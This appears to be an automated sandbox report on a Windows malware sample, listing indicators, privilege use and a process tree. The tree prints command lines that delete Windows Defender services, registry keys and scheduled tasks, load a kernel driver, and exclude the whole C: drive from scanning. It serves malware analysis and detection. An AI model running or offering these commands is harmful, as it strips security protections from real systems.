tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3682b59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c9171d9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 327e56b382.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8b610ed21e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString d5e3ea69b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 d5e3ea69b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4644 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 6288 taskkill.exe 12796 taskkill.exe 6112 taskkill.exe 4888 taskkill.exe 4064 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2416 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 724 rapes.exe 724 rapes.exe 3508 powershell.exe 3508 powershell.exe 3508 powershell.exe 1100 powershell.exe 1100 powershell.exe 1100 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 7036 TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE 7036 TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE 1760 powershell.exe 1760 powershell.exe 1760 powershell.exe 11164 30f17d9520.exe 11164 30f17d9520.exe 5576 rapes.exe 5576 rapes.exe 8888 08422377eb.exe 8888 08422377eb.exe 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 3964 MSBuild.exe 3964 MSBuild.exe 3964 MSBuild.exe 3964 MSBuild.exe 5692 MSBuild.exe 5692 MSBuild.exe 5692 MSBuild.exe 5692 MSBuild.exe 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 9304 327e56b382.exe 9304 327e56b382.exe 9304 327e56b382.exe 9304 327e56b382.exe 9304 327e56b382.exe 9304 327e56b382.exe 10980 d5e3ea69b4.exe 10980 d5e3ea69b4.exe 10980 d5e3ea69b4.exe 10980 d5e3ea69b4.exe 10980 d5e3ea69b4.exe 10980 d5e3ea69b4.exe 11500 chrome.exe 11500 chrome.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 6256 8b610ed21e.exe 6256 8b610ed21e.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 6256 8b610ed21e.exe 6256 8b610ed21e.exe -
Suspicious behavior: LoadsDriver 7 IoCs
pid Process 656 Process not Found 656 Process not Found 412 tzutil.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1620 f73ae_003.exe 1620 f73ae_003.exe 1620 f73ae_003.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe -
Suspicious use of AdjustPrivilegeToken 60 IoCs
description pid Process Token: SeDebugPrivilege 3508 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeLoadDriverPrivilege 412 tzutil.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 8904 tasklist.exe Token: SeDebugPrivilege 8468 tasklist.exe Token: SeDebugPrivilege 12580 6c9171d9.exe Token: SeBackupPrivilege 12580 6c9171d9.exe Token: SeRestorePrivilege 12580 6c9171d9.exe Token: SeLoadDriverPrivilege 12580 6c9171d9.exe Token: SeShutdownPrivilege 12580 6c9171d9.exe Token: SeSystemEnvironmentPrivilege 12580 6c9171d9.exe Token: SeSecurityPrivilege 12580 6c9171d9.exe Token: SeBackupPrivilege 12580 6c9171d9.exe Token: SeRestorePrivilege 12580 6c9171d9.exe Token: SeDebugPrivilege 12580 6c9171d9.exe Token: SeSystemEnvironmentPrivilege 12580 6c9171d9.exe Token: SeSecurityPrivilege 12580 6c9171d9.exe Token: SeCreatePermanentPrivilege 12580 6c9171d9.exe Token: SeShutdownPrivilege 12580 6c9171d9.exe Token: SeLoadDriverPrivilege 12580 6c9171d9.exe Token: SeIncreaseQuotaPrivilege 12580 6c9171d9.exe Token: SeSecurityPrivilege 12580 6c9171d9.exe Token: SeSystemProfilePrivilege 12580 6c9171d9.exe Token: SeDebugPrivilege 12580 6c9171d9.exe Token: SeMachineAccountPrivilege 12580 6c9171d9.exe Token: SeCreateTokenPrivilege 12580 6c9171d9.exe Token: SeAssignPrimaryTokenPrivilege 12580 6c9171d9.exe Token: SeTcbPrivilege 12580 6c9171d9.exe Token: SeAuditPrivilege 12580 6c9171d9.exe Token: SeSystemEnvironmentPrivilege 12580 6c9171d9.exe Token: SeLoadDriverPrivilege 12580 6c9171d9.exe Token: SeLoadDriverPrivilege 12580 6c9171d9.exe Token: SeIncreaseQuotaPrivilege 12580 6c9171d9.exe Token: SeSecurityPrivilege 12580 6c9171d9.exe Token: SeSystemProfilePrivilege 12580 6c9171d9.exe Token: SeDebugPrivilege 12580 6c9171d9.exe Token: SeMachineAccountPrivilege 12580 6c9171d9.exe Token: SeCreateTokenPrivilege 12580 6c9171d9.exe Token: SeAssignPrimaryTokenPrivilege 12580 6c9171d9.exe Token: SeTcbPrivilege 12580 6c9171d9.exe Token: SeAuditPrivilege 12580 6c9171d9.exe Token: SeSystemEnvironmentPrivilege 12580 6c9171d9.exe Token: SeShutdownPrivilege 11500 chrome.exe Token: SeCreatePagefilePrivilege 11500 chrome.exe Token: SeShutdownPrivilege 11500 chrome.exe Token: SeCreatePagefilePrivilege 11500 chrome.exe Token: SeDebugPrivilege 12796 taskkill.exe Token: SeShutdownPrivilege 11500 chrome.exe Token: SeCreatePagefilePrivilege 11500 chrome.exe Token: SeShutdownPrivilege 11500 chrome.exe Token: SeCreatePagefilePrivilege 11500 chrome.exe Token: SeDebugPrivilege 6112 taskkill.exe Token: SeDebugPrivilege 4888 taskkill.exe Token: SeDebugPrivilege 4064 taskkill.exe Token: SeDebugPrivilege 6288 taskkill.exe Token: SeDebugPrivilege 6256 8b610ed21e.exe Token: SeDebugPrivilege 2116 firefox.exe Token: SeDebugPrivilege 2116 firefox.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
pid Process 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 3912 f2839c3fc6.exe 3912 f2839c3fc6.exe 3912 f2839c3fc6.exe 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 11500 chrome.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 2116 firefox.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 7672 msedge.exe -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 3912 f2839c3fc6.exe 3912 f2839c3fc6.exe 3912 f2839c3fc6.exe 7404 Passwords.com 7404 Passwords.com 7404 Passwords.com 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 12572 b969c99e16.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe 2116 firefox.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2116 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1988 wrote to memory of 724 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 89 PID 1988 wrote to memory of 724 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 89 PID 1988 wrote to memory of 724 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 89 PID 724 wrote to memory of 4244 724 rapes.exe 95 PID 724 wrote to memory of 4244 724 rapes.exe 95 PID 724 wrote to memory of 4244 724 rapes.exe 95 PID 4244 wrote to memory of 4172 4244 apple.exe 96 PID 4244 wrote to memory of 4172 4244 apple.exe 96 PID 4244 wrote to memory of 4172 4244 apple.exe 96 PID 4172 wrote to memory of 3024 4172 11.exe 98 PID 4172 wrote to memory of 3024 4172 11.exe 98 PID 3024 wrote to memory of 5076 3024 cmd.exe 100 PID 3024 wrote to memory of 5076 3024 cmd.exe 100 PID 3024 wrote to memory of 5076 3024 cmd.exe 100 PID 5076 wrote to memory of 1164 5076 11.exe 101 PID 5076 wrote to memory of 1164 5076 11.exe 101 PID 1164 wrote to memory of 548 1164 cmd.exe 103 PID 1164 wrote to memory of 548 1164 cmd.exe 103 PID 1164 wrote to memory of 2832 1164 cmd.exe 104 PID 1164 wrote to memory of 2832 1164 cmd.exe 104 PID 1164 wrote to memory of 4644 1164 cmd.exe 105 PID 1164 wrote to memory of 4644 1164 cmd.exe 105 PID 1164 wrote to memory of 4204 1164 cmd.exe 107 PID 1164 wrote to memory of 4204 1164 cmd.exe 107 PID 1164 wrote to memory of 1828 1164 cmd.exe 108 PID 1164 wrote to memory of 1828 1164 cmd.exe 108 PID 1164 wrote to memory of 4676 1164 cmd.exe 109 PID 1164 wrote to memory of 4676 1164 cmd.exe 109 PID 1164 wrote to memory of 4176 1164 cmd.exe 110 PID 1164 wrote to memory of 4176 1164 cmd.exe 110 PID 1164 wrote to memory of 1032 1164 cmd.exe 111 PID 1164 wrote to memory of 1032 1164 cmd.exe 111 PID 1164 wrote to memory of 3508 1164 cmd.exe 112 PID 1164 wrote to memory of 3508 1164 cmd.exe 112 PID 1164 wrote to memory of 2952 1164 cmd.exe 113 PID 1164 wrote to memory of 2952 1164 cmd.exe 113 PID 1164 wrote to memory of 404 1164 cmd.exe 114 PID 1164 wrote to memory of 404 1164 cmd.exe 114 PID 1164 wrote to memory of 4004 1164 cmd.exe 115 PID 1164 wrote to memory of 4004 1164 cmd.exe 115 PID 1164 wrote to memory of 2100 1164 cmd.exe 116 PID 1164 wrote to memory of 2100 1164 cmd.exe 116 PID 1164 wrote to memory of 4276 1164 cmd.exe 117 PID 1164 wrote to memory of 4276 1164 cmd.exe 117 PID 1164 wrote to memory of 4020 1164 cmd.exe 118 PID 1164 wrote to memory of 4020 1164 cmd.exe 118 PID 1164 wrote to memory of 2352 1164 cmd.exe 119 PID 1164 wrote to memory of 2352 1164 cmd.exe 119 PID 1164 wrote to memory of 112 1164 cmd.exe 120 PID 1164 wrote to memory of 112 1164 cmd.exe 120 PID 1164 wrote to memory of 1784 1164 cmd.exe 121 PID 1164 wrote to memory of 1784 1164 cmd.exe 121 PID 1164 wrote to memory of 1564 1164 cmd.exe 122 PID 1164 wrote to memory of 1564 1164 cmd.exe 122 PID 1164 wrote to memory of 704 1164 cmd.exe 123 PID 1164 wrote to memory of 704 1164 cmd.exe 123 PID 1164 wrote to memory of 2452 1164 cmd.exe 124 PID 1164 wrote to memory of 2452 1164 cmd.exe 124 PID 1164 wrote to memory of 1760 1164 cmd.exe 125 PID 1164 wrote to memory of 1760 1164 cmd.exe 125 PID 1164 wrote to memory of 2640 1164 cmd.exe 126 PID 1164 wrote to memory of 2640 1164 cmd.exe 126 PID 1164 wrote to memory of 4048 1164 cmd.exe 127 PID 1164 wrote to memory of 4048 1164 cmd.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe"C:\Users\Admin\AppData\Local\Temp\5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AFB8.tmp\AFB9.tmp\AFBA.bat C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B21A.tmp\B21B.tmp\B21C.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:548
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:4644
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:4204
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1828
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4676
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4176
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:1032
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:3508
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:2952
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:404
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:4004
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:2100
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:4276
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:4020
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:2352
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:112
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:1784
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:1564
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:704
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:2452
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:1760
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:4048
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:3564
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:1932
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:2372
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:3296
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1200
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:3264
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:3600
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:776
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:4664
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:1392
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:4316
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:3828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:1204
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:4220
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:1100
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:5020
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:4828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:3336
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2588
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:1780
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:4620
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:1852
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:4496
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:4476
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:4880
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:4884
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:4228
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:232
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:3252
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:968
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:1236
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:628
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:2068
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:4920
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1620 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:3728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:2896 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\{b5a5bf35-b578-4408-b836-6bfca3511e43}\3682b59.exe"C:\Users\Admin\AppData\Local\Temp\{b5a5bf35-b578-4408-b836-6bfca3511e43}\3682b59.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot6⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:6696 -
C:\Users\Admin\AppData\Local\Temp\{68f4c23a-4cbc-495e-983f-e8146fbc9b1b}\6c9171d9.exeC:/Users/Admin/AppData/Local/Temp/{68f4c23a-4cbc-495e-983f-e8146fbc9b1b}/\6c9171d9.exe -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
